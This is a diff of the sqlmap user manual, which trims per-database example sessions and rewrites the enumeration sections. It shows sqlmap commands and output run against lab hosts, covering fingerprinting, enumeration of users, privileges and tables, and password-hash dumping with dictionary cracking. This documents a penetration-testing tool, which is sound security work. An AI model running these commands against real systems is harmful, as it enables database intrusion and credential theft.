-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: active fingerprint: PostgreSQL >= 8.3.0
-               html error message fingerprint: PostgreSQL
-</verb></tscreen>
-
 <p>
 As you can see from the last example, sqlmap first tested for MySQL,
 then for Oracle, then for PostgreSQL since the user did not forced the
 back-end database management system name with option <tt>-</tt><tt>-dbms</tt>.
 
-<p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" -v 1 -f
-
-[...]
-[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
-[hh:mm:41] [INFO] testing Microsoft SQL Server
-[hh:mm:41] [INFO] confirming Microsoft SQL Server
-[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS:	active fingerprint: Microsoft SQL Server 2000
-                html error message fingerprint: Microsoft SQL Server
-</verb></tscreen>
-
-<p>
-Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.36/sqlmap/get_str.asp?name=luther" -v 1 -f
-
-[...]
-[hh:mm:41] [WARNING] the back-end DMBS is not PostgreSQL
-[hh:mm:41] [INFO] testing Microsoft SQL Server
-[hh:mm:41] [INFO] confirming Microsoft SQL Server
-[hh:mm:41] [INFO] the back-end DBMS is Microsoft SQL Server
-web server operating system: Windows 2003 or 2000
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS: active fingerprint: Microsoft SQL Server 2005
-               html error message fingerprint: Microsoft SQL Server
-</verb></tscreen>
-
 <p>
 If you want an even more accurate result, based also on banner parsing,
 you can also provide the <tt>-b</tt> or <tt>-</tt><tt>-banner</tt> option.
 
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -v 2 -f -b
-
-[...]
-[hh:mm:04] [INFO] testing MySQL
-[hh:mm:04] [INFO] confirming MySQL
-[hh:mm:04] [DEBUG] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
-[hh:mm:04] [INFO] retrieved: 0
-[hh:mm:04] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:04] [INFO] the back-end DBMS is MySQL
-[hh:mm:04] [DEBUG] query: VERSION()
-[hh:mm:04] [INFO] retrieved: 5.0.67-0ubuntu6
-[hh:mm:05] [DEBUG] performed 111 queries in 1 seconds
-[hh:mm:05] [DEBUG] query: SELECT 0 FROM information_schema.PARAMETERS LIMIT 0, 1
-[hh:mm:05] [INFO] retrieved: 
-[hh:mm:05] [DEBUG] performed 6 queries in 0 seconds
-[hh:mm:05] [DEBUG] query: MID(@@table_open_cache, 1, 1)
-[hh:mm:05] [INFO] retrieved: 
-[hh:mm:05] [DEBUG] performed 6 queries in 0 seconds
-[hh:mm:05] [DEBUG] query: MID(@@hostname, 1, 1)
-[hh:mm:05] [INFO] retrieved: t
-[hh:mm:06] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:06] [INFO] executing MySQL comment injection fingerprint
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-back-end DBMS: active fingerprint: MySQL >= 5.0.38 and < 5.1.2
-               comment injection fingerprint: MySQL 5.0.67
-               banner parsing fingerprint: MySQL 5.0.67
-               html error message fingerprint: MySQL
-[...]
-</verb></tscreen>
-
 <p>
 As you can see, sqlmap was also able to fingerprint the back-end DBMS
 operating system by parsing the DBMS banner value.
 
-<p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" -v 2 -f -b
-
-[...]
-[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
-[hh:mm:03] [INFO] testing Microsoft SQL Server
-[hh:mm:03] [INFO] confirming Microsoft SQL Server
-[hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
-[hh:mm:03] [DEBUG] performed 13 queries in 0 seconds
-[hh:mm:03] [DEBUG] query: @@VERSION
-[hh:mm:03] [INFO] retrieved: Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
-	Aug  6 2000 00:57:48 
-	Copyright (c) 1988-2000 Microsoft Corporation
-	Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
-
-[hh:mm:08] [DEBUG] performed 1308 queries in 4 seconds
-web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS operating system: Windows 2000 Service Pack 4
-back-end DBMS:	active fingerprint: Microsoft SQL Server 2000
-                banner parsing fingerprint: Microsoft SQL Server 2000 Service Pack 0 
-                version 8.00.194
-                html error message fingerprint: Microsoft SQL Server
-[...]
-</verb></tscreen>
-
-<p>
-Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.36/sqlmap/get_str.asp?name=luther" -v 2 -f -b
-
-[...]
-[hh:mm:03] [WARNING] the back-end DMBS is not PostgreSQL
-[hh:mm:03] [INFO] testing Microsoft SQL Server
-[hh:mm:03] [INFO] confirming Microsoft SQL Server
-[hh:mm:03] [INFO] the back-end DBMS is Microsoft SQL Server
-[hh:mm:03] [DEBUG] query: @@VERSION
-[hh:mm:03] [INFO] retrieved: Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
-	Oct 14 2005 00:33:37 
-	Copyright (c) 1988-2005 Microsoft Corporation
-	Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
-
-[hh:mm:15] [DEBUG] performed 1343 queries in 11 seconds
-web server operating system: Windows 2003 or 2000
-web application technology: ASP.NET, Microsoft IIS 6.0, ASP
-back-end DBMS operating system: Windows 2003 Service Pack 1
-back-end DBMS: active fingerprint: Microsoft SQL Server 2005
-               banner parsing fingerprint: Microsoft SQL Server 2005 Service Pack 0 
-               version 9.00.1399
-               html error message fingerprint: Microsoft SQL Server
-[...]
-</verb></tscreen>
-
 <p>
 As you can see, from the Microsoft SQL Server banner, sqlmap was able to
 correctly identify the database management system patch level.
@@ -2423,69 +1808,11 @@ Switch: <tt>-b</tt> or <tt>-</tt><tt>-banner</tt>
 
 <p>
 Most of the modern database management systems have a function and/or 
-an environment variable which returns details on the database management
-system version. Also, sometimes it returns the operating system version 
-where the daemon has been compiled on, the operating system architecture, 
-and its service pack. Usually the function is <tt>version()</tt> and the 
-environment variable <tt>@@version</tt>.
-
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" -b -v 0
-
-banner:    '5.0.67-0ubuntu6'
-</verb></tscreen>
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" -b -v 0
-
-banner:    'PostgreSQL 8.3.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.3.real 
-(Ubuntu 4.3.2-1ubuntu11) 4.3.2'
-</verb></tscreen>
-
-<p>
-Example on an <bf>Oracle XE 10.2.0.1</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -b -v 0
-
-banner:    'Oracle Database 10g Express Edition Release 10.2.0.1.0 - Product'
-</verb></tscreen>
-
-<p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" -b -v 0
-
-banner:
----
-Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
-        Aug  6 2000 00:57:48 
-        Copyright (c) 1988-2000 Microsoft Corporation
-        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
----
-</verb></tscreen>
-
-<p>
-Example on a <bf>Microsoft SQL Server 2005 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.36/sqlmap/get_str.asp?name=luther" -v 0 -b
-
-banner:
----
-Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
-	Oct 14 2005 00:33:37 
-	Copyright (c) 1988-2005 Microsoft Corporation
-	Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
----
-</verb></tscreen>
+an environment variable which returns the database management system
+version and eventually details on its patch level, the underlying
+system. Usually the function is <tt>version()</tt> and the environment
+variable is <tt>@@version</tt>, but this vary depending on the target
+DBMS.
 
 
 <sect2>Session user
@@ -2494,17 +1821,9 @@ Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
 Switch: <tt>-</tt><tt>-current-user</tt>
 
 <p>
-It is possible to retrieve the database management system's user which is
-effectively performing the query on the database from the web application.
-
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --current-user -v 0
-
-current user:    'testuser@localhost'
-</verb></tscreen>
+On the majority of modern DBMSes is possible to retrieve the database
+management system's user which is effectively performing the query against
+the back-end DBMS from the web application.
 
 
 <sect2>Current database
@@ -2513,579 +1832,191 @@ current user:    'testuser@localhost'
 Switch: <tt>-</tt><tt>-current-db</tt>
 
 <p>
-It is possible to retrieve the database management system's database the
-web application is connected to.
-
-<p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --current-db -v 0
-
-current database:    'master'
-</verb></tscreen>
+It is possible to retrieve the database management system's database name
+that the web application is connected to.
 
 
-<sect2>Detect if the session user is a database administrator (DBA)
+<sect2>Detect whether or not the session user is a database administrator
 
 <p>
 Switch: <tt>-</tt><tt>-is-dba</tt>
 
 <p>
-It is possible to detect if the current database management system session user is
-a database administrator.
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --is-dba -v 2
-
-[...]
-back-end DBMS: PostgreSQL
-
-[hh:mm:49] [INFO] testing if current user is DBA
-[hh:mm:49] [DEBUG] query: SELECT (CASE WHEN ((SELECT usesuper=true FROM pg_user WHERE 
-usename=CURRENT_USER OFFSET 0 LIMIT 1)) THEN 1 ELSE 0 END)
-[hh:mm:49] [INFO] retrieved: 1
-[hh:mm:50] [DEBUG] performed 13 queries in 0 seconds
-current user is DBA:    'True'
-</verb></tscreen>
-
-<p>
-Example on an <bf>Oracle XE 10.2.0.1</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --is-dba -v 2
-
-[...]
-back-end DBMS: Oracle
-
-[hh:mm:57] [INFO] testing if current user is DBA
-[hh:mm:58] [DEBUG] query: SELECT (CASE WHEN ((SELECT GRANTED_ROLE FROM DBA_ROLE_PRIVS WHERE 
-GRANTEE=SYS.LOGIN_USER AND GRANTED_ROLE=CHR(68)||CHR(66)||CHR(65))=CHR(68)||CHR(66)||CHR(65)) 
-THEN 1 ELSE 0 END) FROM DUAL
-[hh:mm:58] [INFO] retrieved: 1
-[hh:mm:58] [DEBUG] performed 13 queries in 0 seconds
-current user is DBA:    'True'
-</verb></tscreen>
+It is possible to detect if the current database management system session
+user is a database administrator, also known as DBA.
+sqlmap will return <tt>True</tt> if it is, viceversa <tt>False</tt>.
 
 
-<sect2>Users
+<sect2>List database management system users
 
 <p>
 Switch: <tt>-</tt><tt>-users</tt>
 
 <p>
-It is possible to enumerate the list of database management system users.
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --users -v 0
-
-database management system users [3]:
-[*] postgres
-[*] testuser
-[*] testuser2
-</verb></tscreen>
+When the session user has read access to the system table containing
+information about the DBMS users, it is possible to enumerate the list of
+users.
 
 
-<sect2>Users password hashes
+<sect2>List and crack database management system users password hashes
 
 <p>
 Switches: <tt>-</tt><tt>-passwords</tt> and <tt>-U</tt>
 
 <p>
-It is possible to enumerate the password hashes for each database
-management system user.
+When the session user has read access to the system table containing
+information about the DBMS users' passwords, it is possible to enumerate
+the password hashes for each database management system user.
+sqlmap will first enumerate the users, then the different password hashes
+for each of them.
 
 <p>
-Example on a <bf>MySQL 5.0.67</bf> target:
+Example against a PostgreSQL target:
 
 <tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --passwords -v 0
-
-[*] debian-sys-maint [1]:
-    password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892
-[*] root [1]:
-    password hash: *81F5E21235407A884A6CD4A731FEBFB6AF209E1B
-[*] testuser [1]:
-    password hash: *00E247BD5F9AF26AE0194B71E1E769D1E1429A29
-</verb></tscreen>
-
-<p>
-You can also provide the <tt>-U</tt> option to specify the user who you
-want to enumerate the password hashes.
-
-<p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --passwords \
-  -U sa -v 0
-
-database management system users password hashes:
-[*] sa [1]:
-    password hash: 0x01000a16d704fa252b7c38d1aeae18756e98172f4b34104d8ce32c2f01b293b03edb7491f
-ba9930b62ee5d506955
-        header: 0x0100
-        salt: 0a16d704
-        mixedcase: fa252b7c38d1aeae18756e98172f4b34104d8ee3
-        uppercase: 2c2f01b293b03edb7491fba9930b62ce5d506955
-</verb></tscreen>
-
-<p>
-As you can see, when you enumerate password hashes on Microsoft SQL Server
-sqlmap split the hash, useful if you want to crack it.
-
-<p>
-If you provide <tt>CU</tt> as username it will consider it as an alias for
-current user and will retrieve the password hashes for this user.
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords \
-  -U CU -v 1
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
 
 [...]
 back-end DBMS: PostgreSQL
-
-[hh:mm:48] [INFO] fetching current user
-[hh:mm:48] [INFO] retrieved: postgres
-[hh:mm:49] [INFO] fetching database users password hashes for current user
-[hh:mm:49] [INFO] fetching number of password hashes for user 'postgres'
-[hh:mm:49] [INFO] retrieved: 1
-[hh:mm:49] [INFO] fetching password hashes for user 'postgres'
-[hh:mm:49] [INFO] retrieved: md5d7d880f96044b72d0bba108ace96d1e4
+[hh:mm:38] [INFO] fetching database users password hashes
+do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
+[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
+what's the dictionary's location? [/tmp/sqlmap/txt/wordlist.txt] 
+[hh:mm:46] [INFO] loading dictionary from: '/tmp/sqlmap/txt/wordlist.txt'
+do you want to use common password suffixes? (slow!) [y/N] n
+[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
+[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
+[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
 database management system users password hashes:
 [*] postgres [1]:
-    password hash: md5d7d880f96034b72d0bba108afe96c1e7
+    password hash: md5d7d880f96044b72d0bba108ace96d1e4
+    clear-text password: testpass
+[*] testuser [1]:
+    password hash: md599e5ea7a6f7c3269995cba3927fd0093
+    clear-text password: testpass
 </verb></tscreen>
 
+<p>
+Not only sqlmap enumerated the DBMS users and their passwords, but it also
+recognized the hash format to be PostgreSQL, asked the user whether or not
+to test the hashes against a dictionary file and identified the clear-text
+password for the <tt>postgres</tt> user, which is usually a DBA along the
+other user, <tt>testuser</tt>, password.
 
-<sect2>Users privileges
+<p>
+This feature has been implemented for all DBMS where it is possible to
+enumerate users' password hashes, including Oracle and Microsoft SQL
+Server pre and post 2005.
+
+<p>
+You can also provide the <tt>-U</tt> option to specify the specific user
+who you want to enumerate and eventually crack the password hash(es).
+If you provide <tt>CU</tt> as username it will consider it as an alias for
+current user and will retrieve the password hash(es) for this user.
+
+
+<sect2>List database management system users privileges
 
 <p>
 Switches: <tt>-</tt><tt>-privileges</tt> and <tt>-U</tt>
 
 <p>
-It is possible to enumerate the privileges for each database management
-system user.
-
-<p>
-Example on an <bf>Oracle XE 10.2.0.1</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --privileges -v 0
-
-[hh:mm:25] [WARNING] unable to retrieve the number of privileges for user 'ANONYMOUS'
-[hh:mm:28] [WARNING] unable to retrieve the number of privileges for user 'DIP'
-database management system users privileges:
-[*] CTXSYS [2]:
-    privilege: CTXAPP
-    privilege: RESOURCE
-[*] DBSNMP [1]:
-    privilege: OEM_MONITOR
-[*] FLOWS_020100 (administrator) [4]:
-    privilege: CONNECT
-    privilege: DBA
-    privilege: RESOURCE
-    privilege: SELECT_CATALOG_ROLE
-[*] FLOWS_FILES [2]:
-    privilege: CONNECT
-    privilege: RESOURCE
-[*] HR (administrator) [3]:
-    privilege: CONNECT
-    privilege: DBA
-    privilege: RESOURCE
-[*] MDSYS [2]:
-    privilege: CONNECT
-    privilege: RESOURCE
-[*] OUTLN [1]:
-    privilege: RESOURCE
-[*] SYS (administrator) [22]:
-    privilege: AQ_ADMINISTRATOR_ROLE
-    privilege: AQ_USER_ROLE
-    privilege: AUTHENTICATEDUSER
-    privilege: CONNECT
-    privilege: CTXAPP
-    privilege: DBA
-    privilege: DELETE_CATALOG_ROLE
-    privilege: EXECUTE_CATALOG_ROLE
-    privilege: EXP_FULL_DATABASE
-    privilege: GATHER_SYSTEM_STATISTICS
-    privilege: HS_ADMIN_ROLE
-    privilege: IMP_FULL_DATABASE
-    privilege: LOGSTDBY_ADMINISTRATOR
-    privilege: OEM_ADVISOR
-    privilege: OEM_MONITOR
-    privilege: PLUSTRACE
-    privilege: RECOVERY_CATALOG_OWNER
-    privilege: RESOURCE
-    privilege: SCHEDULER_ADMIN
-    privilege: SELECT_CATALOG_ROLE
-    privilege: XDBADMIN
-    privilege: XDBWEBSERVICES
-[*] SYSTEM (administrator) [2]:
-    privilege: AQ_ADMINISTRATOR_ROLE
-    privilege: DBA
-[*] TSMSYS [1]:
-    privilege: RESOURCE
-[*] XDB [2]:
-    privilege: CTXAPP
-    privilege: RESOURCE
-</verb></tscreen>
+When the session user has read access to the system table containing
+information about the DBMS users, it is possible to enumerate the
+privileges for each database management system user.
+By the privileges, sqlmap will also show you which are database
+administrators.
 
 <p>
 You can also provide the <tt>-U</tt> option to specify the user who you
 want to enumerate the privileges.
 
 <p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
+If you provide <tt>CU</tt> as username it will consider it as an alias for
+current user and will enumerate the privileges for this user.
 
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --privileges \
-  -U postgres -v 0
 
-database management system users privileges:
-[*] postgres (administrator) [3]:
-    privilege: catupd
-    privilege: createdb
-    privilege: super
-</verb></tscreen>
+<sect2>List database management system users roles
 
 <p>
-As you can see, depending on the user privileges, sqlmap identifies if the
-user is a database management system administrator and shows this information
-next to the username.
+Switches: <tt>-</tt><tt>-roles</tt> and <tt>-U</tt>
+
+<p>
+When the session user has read access to the system table containing
+information about the DBMS users, it is possible to enumerate the
+roles for each database management system user.
+
+<p>
+You can also provide the <tt>-U</tt> option to specify the user who you
+want to enumerate the privileges.
 
 <p>
 If you provide <tt>CU</tt> as username it will consider it as an alias for
 current user and will enumerate the privileges for this user.
 
 <p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords \
-  -U CU -v 1
-
-[...]
-back-end DBMS: PostgreSQL
-
-[hh:mm:25] [INFO] fetching current user
-[hh:mm:25] [INFO] retrieved: postgres
-[hh:mm:25] [INFO] fetching database users privileges for current user
-[hh:mm:25] [INFO] fetching number of privileges for user 'postgres'
-[hh:mm:25] [INFO] retrieved: 1
-[hh:mm:25] [INFO] fetching privileges for user 'postgres'
-[hh:mm:25] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
-into distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:25] [INFO] retrieved: 1
-[hh:mm:25] [INFO] retrieved: 1
-[hh:mm:25] [INFO] retrieved: 1
-database management system users privileges:
-[*] postgres (administrator) [3]:
-    privilege: catupd
-    privilege: createdb
-    privilege: super
-</verb></tscreen>
-
-<p>
-Note that this feature is not available if the back-end database
-management system is Microsoft SQL Server.
+This feature is only available when the DBMS is Oracle.
 
 
-<sect2>Available databases
+<sect2>List database management system's databases
 
 <p>
 Switch: <tt>-</tt><tt>-dbs</tt>
 
 <p>
-It is possible to enumerate the list of databases.
+When the session user has read access to the system table containing
+information about available databases, it is possible to enumerate the
+list of databases.
 
 <p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
+Note that this feature is not available if the database management system
+is Oracle.
 
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --dbs -v 0
 
-available databases [6]:
-[*] master
-[*] model
-[*] msdb
-[*] Northwind
-[*] pubs
-[*] tempdb
-</verb></tscreen>
-
-<p>
-Note that this feature is not available if the back-end database
-management system is Oracle.
-
-<sect2>Databases tables
+<sect2>Enumerate database's tables
 
 <p>
 Switches: <tt>-</tt><tt>-tables</tt> and <tt>-D</tt>
 
 <p>
-It is possible to enumerate the list of tables for all database
-management system's databases.
+When the session user has read access to the system table containing
+information about databases' tables, it is possible to enumerate
+the list of tables for a specific database management system's databases.
 
 <p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tables -v 0
-
-Database: testdb
-[1 table]
-+---------------------------------------+
-| users                                 |
-+---------------------------------------+
-
-Database: information_schema
-[17 tables]
-+---------------------------------------+
-| CHARACTER_SETS                        |
-| COLLATION_CHARACTER_SET_APPLICABILITY |
-| COLLATIONS                            |
-| COLUMN_PRIVILEGES                     |
-| COLUMNS                               |
-| KEY_COLUMN_USAGE                      |
-| PROFILING                             |
-| ROUTINES                              |
-| SCHEMA_PRIVILEGES                     |
-| SCHEMATA                              |
-| STATISTICS                            |
-| TABLE_CONSTRAINTS                     |
-| TABLE_PRIVILEGES                      |
-| TABLES                                |
-| TRIGGERS                              |
-| USER_PRIVILEGES                       |
-| VIEWS                                 |
-+---------------------------------------+
-
-Database: mysql
-[17 tables]
-+---------------------------------------+
-| columns_priv                          |
-| db                                    |
-| func                                  |
-| help_category                         |
-| help_keyword                          |
-| help_relation                         |
-| help_topic                            |
-| host                                  |
-| proc                                  |
-| procs_priv                            |
-| tables_priv                           |
-| time_zone                             |
-| time_zone_leap_second                 |
-| time_zone_name                        |
-| time_zone_transition                  |
-| time_zone_transition_type             |
-| user                                  |
-+---------------------------------------+
-</verb></tscreen>
-
-<p>
-You can also provide the <tt>-D</tt> option to specify the database
-that you want to enumerate the tables.
-
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --tables \
-  -D testdb -v 0
-
-Database: testdb
-[1 table]
-+---------------------------------------+
-| users                                 |
-+---------------------------------------+
-</verb></tscreen>
-
-<p>
-Example on an <bf>Oracle XE 10.2.0.1</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --tables \
-  -D users -v 0
-
-Database: USERS
-[8 tables]
-+-------------------+
-| DEPARTMENTS       |
-| EMPLOYEES         |
-| HTMLDB_PLAN_TABLE |
-| JOB_HISTORY       |
-| JOBS              |
-| LOCATIONS         |
-| REGIONS           |
-| USERS             |
-+-------------------+
-</verb></tscreen>
+If you do not provide a specific database with switch <tt>-D</tt>, sqlmap
+will enumerate the tables for all DBMS databases.
 
 <p>
 Note that on Oracle you have to provide the <tt>TABLESPACE_NAME</tt>
-instead of the database name. In provided example <tt>users</tt> was
-used to retrieve all tables owned by an Oracle database management 
-system user.
+instead of the database name.
 
 
-<sect2>Database table columns
+<sect2>Enumerate database table columns
 
 <p>
 Switches: <tt>-</tt><tt>-columns</tt>, <tt>-C</tt>, <tt>-T</tt> and <tt>-D</tt>
 
 <p>
-It is possible to enumerate the list of columns for a specific database
-table.
-This functionality depends on the option <tt>-T</tt> to specify the table name
-and optionally on <tt>-D</tt> to specify the database name.
-
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --columns \
-  -T users -D testdb -v 1
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:20] [INFO] fetching columns for table 'users' on database 'testdb'
-[hh:mm:20] [INFO] fetching number of columns for table 'users' on database 'testdb'
-[hh:mm:20] [INFO] retrieved: 3
-[hh:mm:20] [INFO] retrieved: id
-[hh:mm:20] [INFO] retrieved: int(11)
-[hh:mm:21] [INFO] retrieved: name
-[hh:mm:21] [INFO] retrieved: varchar(500)
-[hh:mm:21] [INFO] retrieved: surname
-[hh:mm:21] [INFO] retrieved: varchar(1000)
-Database: testdb
-Table: users
-[3 columns]
-+---------+---------------+
-| Column  | Type          |
-+---------+---------------+
-| id      | int(11)       |
-| name    | varchar(500)  |
-| surname | varchar(1000) |
-+---------+---------------+
-</verb></tscreen>
-
-<p>
-Example on a <bf>Microsoft SQL Server 2000 Service Pack 0</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --columns \
-  -T users -D master -v 0
-
-Database: master
-Table: users
-[3 columns]
-+---------+---------+
-| Column  | Type    |
-+---------+---------+
-| id      | int     |
-| name    | varchar |
-| surname | varchar |
-+---------+---------+
-</verb></tscreen>
-
-<p>
-Example on a <bf>PostgreSQL 8.3.5</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --columns \
-  -T users -D public -v 0
-
-Database: public
-Table: users
-[3 columns]
-+---------+--------+
-| Column  | Type   |
-+---------+--------+
-| id      | int4   |
-| name    | bpchar |
-| surname | bpchar |
-+---------+--------+
-</verb></tscreen>
-
-<p>
-Note that on PostgreSQL you have to provide <tt>public</tt> or the
-name of a system database. That's because it is not possible to enumerate 
-other databases tables, only the tables under the schema that the web
-application's user is connected to, which is always <tt>public</tt>.
-
-<p>
-If the database name is not specified, the current database name is used.
-
-<p>
-Example on a <bf>MySQL 5.0.67</bf> target:
-
-<tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --columns \
-  -T users -v 1
-
-[...]
-back-end DBMS: MySQL >= 5.0.0
-
-[hh:mm:45] [WARNING] missing database parameter, sqlmap is going to use the current 
-database to enumerate table 'users' columns
-[hh:mm:45] [INFO] fetching current database
-[hh:mm:45] [INFO] retrieved: testdb
-[hh:mm:45] [INFO] fetching columns for table 'users' on database 'testdb'
-[hh:mm:45] [INFO] fetching number of columns for table 'users' on database 'testdb'
-[hh:mm:45] [INFO] retrieved: 3
-[hh:mm:45] [INFO] retrieved: id
-[hh:mm:45] [INFO] retrieved: int(11)
-[hh:mm:46] [INFO] retrieved: name
-[hh:mm:46] [INFO] retrieved: varchar(500)
-[hh:mm:46] [INFO] retrieved: surname
-[hh:mm:46] [INFO] retrieved: varchar(1000)
-Database: testdb
-Table: users
-[3 columns]
-+---------+---------------+
-| Column  | Type          |
-+---------+---------------+
-| id      | int(11)       |
-| name    | varchar(500)  |
-| surname | varchar(1000) |
-+---------+---------------+
-</verb></tscreen>
+When the session user has read access to the system table containing
+information about database's tables, it is possible to enumerate the list
+of columns for a specific database table.
+sqlmap also enumerates the data-type for each column.
 
 <p>
+This feature depends on the option <tt>-T</tt> to specify the table name
+and optionally on <tt>-D</tt> to specify the database name. When the
+database name is not specified, the current database name is used.
 You can also provide the <tt>-C</tt> option to specify the table columns
 name like the one you provided to be enumerated.
 
 <p>
-Example on a <bf>MySQL 5.0.67</bf> target:
+Example against a MySQL target:
 
 <tscreen><verb>
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --columns \
-  -T users -C name -v 1
-
+$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \
+  -T users -C name
 [...]
-[hh:mm:20] [WARNING] missing database parameter, sqlmap is going to use the current 
-database to enumerate table 'users' columns
-[hh:mm:20] [INFO] fetching current database
-[hh:mm:20] [INFO] retrieved: testdb
-[hh:mm:20] [INFO] fetching columns like 'name' for table 'users' on database 'testdb'
-[hh:mm:20] [INFO] fetching number of columns for table 'users' on database 'testdb'
-[hh:mm:20] [INFO] retrieved: 2
-[hh:mm:20] [INFO] retrieved: name
